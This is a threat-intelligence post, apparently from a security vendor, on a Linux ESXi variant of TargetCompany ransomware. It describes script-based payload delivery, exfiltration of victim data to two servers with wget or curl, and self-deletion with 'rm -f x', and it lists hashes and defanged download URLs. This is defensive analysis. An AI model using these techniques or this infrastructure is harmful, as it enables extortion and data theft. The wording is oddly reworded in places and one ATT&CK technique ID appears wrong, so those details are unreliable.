Ransomware
In this post, our experts analyze TargetCompany ransomware’s Linux variant targeting VMware ESXi environments using innovative methods for distributing and executing payloads.
Time to read: ( words)
Synopsis
- TargetCompany’s ransomware syndicate has introduced a fresh Linux version utilizing a customized shell script for delivering and executing payloads, a tactic unprecedented in prior versions.
- The shell script also transfers the victim’s data to dual servers to ensure the ransomware actors have a backup of the information.
- This Linux-based variant can detect if the victim’s system is operating within a VMWare ESXi setting.
- By concentrating on ESXi servers, the ransomware perpetrators linked to TargetCompany hope to disrupt operations more efficiently and enhance the possibility of obtaining a ransom.
- The TargetCompany affiliate associated with the ransomware specimen indicates a broader campaign targeting extensive IT infrastructures.
Initially found in June 2021, the TargetCompany ransomware is monitored by Trend Micro as “Water Gatpanapun” and has a leak platform named “Mallox.” Observations indicate that this group’s operations have been most active in Taiwan, India, Thailand, and South Korea this year.
Since its identification, TargetCompany has been refining its methods to bypass security measures implemented by organizations; one such method involves leveraging a PowerShell script to circumvent Antimalware Scan Interface (AMSI) and misuse of fully undetectable (FUD) obfuscator packers.
Recently, our threat detection unit unearthed a new variation of the TargetCompany ransomware specifically designed for Linux environments. This version employs a shell script for delivering and executing the payload (See Figure 1).
This approach has not yet been detected in prior variations of TargetCompany, suggesting that the ransomware syndicate has been continuously advancing to utilize more intricate techniques in its upcoming assaults. This recently discovered Linux variation corresponds with the current pattern of ransomware syndicates expanding their assaults to critical Linux environments, potentially widening the scope of potential victims.
TargetCompany’s Linux variation
This newest variation verifies if the executable is running with elevated privileges (Figure 2). If not, it will cease its malicious sequence. This implies that a compromised or unsecured device was successfully utilized to acquire administrative access for executing the ransomware payload.
Exfiltrating confidential victim data
Subsequent to its running, it deploys a text document titled TargetInfo.txt housing victim details, as illustrated in Figure 3. The contents of TargetInfo.txt get dispatched to a command-and-control (C&C) server, hxxp://91[BLOCKED], using the filename ap.php (Figure 4). This activity mirrors that of the ransomware’s Windows version.
Targeting ESXi infrastructures
The malicious actors linked to TargetCompany have broadened their focus to encompass virtualization servers, intending to induce more harm and operational interference. They have also integrated a functionality to identify if the system is operating within a VMWare ESXi environment, a platform commonly employed for hosting critical virtualized setups in enterprises (Figure 5). Encrypting vital ESXi servers might heighten the chances of successful ransom payments.
The program evaluates by executing the “uname” command to ascertain if the machine is working in a VMWare ESXi environment.
If the system identifier matches “vmkernel”, it signifies that the machine is functioning in VMware’s ESXi hypervisor, and the program transitions into “VM mode…” to encrypt files with the formats in Figure 6.
Data encryption and ransom message deployment
Execution of TargetCompany using a command script
The personalized shell script is also proficient in extracting data to an alternative server. Following the malicious activities of the ransomware payload, the script will peruse the content of the deposited text file TargetInfo.txt and transmit it to another URL utilizing either “wget” or “curl”.
This variation transports victim details to two distinct servers. It’s plausible that incorporating this method into TargetCompany’s scheming enhances redundancy and provides a safety net in case a server suffers downtime or is compromised.
Upon completion of the ransomware task, the script eliminates the TargetCompany payload through the directive “rm -f x”.
This method is conventional, yet it presents significant hurdles for defenders. Security professionals will possess minimal evidentiary material for scrutiny during inquiries and response endeavors, thereby complicating the assessment of the attack’s overall impact.
Infrastructure
The IP address utilized for deploying the payload and transferring a victim’s system details hasn’t been detected in preceding TargetCompany campaigns. Research reveals that this IP address is housed by China Mobile Communications, an internet service provider (ISP) in China.
Given that the service provider hosts the IP address, there’s a likelihood that TargetCompany’s malevolent actors acquired the IP address for hosting their damaging payload (Figure 12).
The certificate was newly registered and remains valid for a fleeting three months, hinting at potential short-term use. Upon accessing the IP address, we encountered a homepage reminiscent of the Tongda Xinke OA login interface (Figure 13).
Associate “vampire”
The specific exemplar displayed in Figure 14 is linked with an associate named “vampire,” inferred from the data it transmits to its C&C server. This points to extensive campaigns entailing steep ransom requests and broad IT system targeting. This associate may have connections with the affiliate mentioned in a blog post shared by Sekoia.
Summary
Malign entities continuously enhance their assaults, exemplified by the emergence of TargetCompany’s latest Linux variant, broadening the ransomware’s target scope to incorporate VMWare ESXi environments. Hence, maintaining vigilance against evolving ransomware variants stands crucial for defenders. Enforcing established cybersecurity protocols can mitigate the risk of succumbing to ransomware schemes and safeguard an organization’s asset data integrity. Organizations can adopt best practices like:
- Enabling multi-factor authentication (MFA) to thwart attackers’ lateral movement within a network.
- Following the 3-2-1 rule for backing up crucial files — producing three backup variants in two diverse file formats, with one copy stored in a disparate location
- Regularly patching and updating systems; maintaining up-to-date operating systems and applications is imperative to deter malevolent actors from exploiting software vulnerabilities.
Trend Vision One™ exploration query
- malName:*Linux.TARGETCOMP* AND eventName:MALWARE_DETECTION
Signs of compromise (SOCs)
Signatures
| Hash | Detection | Description |
| dffa99b9fe6e7d3e19afba38c9f7ec739581f656 | Ransom.Linux.TARGETCOMP.YXEEQT | TargetCompany Linux Variant |
| 2b82b463dab61cd3d7765492d7b4a529b4618e57 | Trojan.SH.TARGETCOMP.THEAGBD | Shell Script |
| 9779aa8eb4c6f9eb809ebf4646867b0ed38c97e1 | Ransom.Win64.TARGETCOMP.YXECMT | TargetCompany samples linked to affiliate vampire |
| 3642996044cd85381b19f28a9ab6763e2bab653c | Ransom.Win64.TARGETCOMP.YXECFT | TargetCompany samples tied to affiliate vampire |
| 4cdee339e038f5fc32dde8432dc3630afd4df8a2 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany samples related to affiliate vampire |
| 0f6bea3ff11bb56c2daf4c5f5c5b2f1afd3d5098 | Ransom.Win32.TARGETCOMP.SMYXCLAZ | TargetCompany samples associated with affiliate vampire |
Links
| URL | Detection | Description |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh | 90 – Unverified | Script URL for download |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x | 79 – Disease Vector | Ransomware payload URL for download |
| hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/post.php | 79 – Disease Vector | Upload URL |
MITRE ATT&CK tactics and techniques
| Tactic | Technique | ID |
| Defense Evasion | File Deletion | T1070.004 |
| Discovery | System Information Discovery | T1082 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Exfiltration | Exfiltration over Alternative Protocol | T1408 |
| Exfiltration over C2 Channel | T1041 | |
| Impact | Data Encrypted for Impact | T1486 |
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
About Author
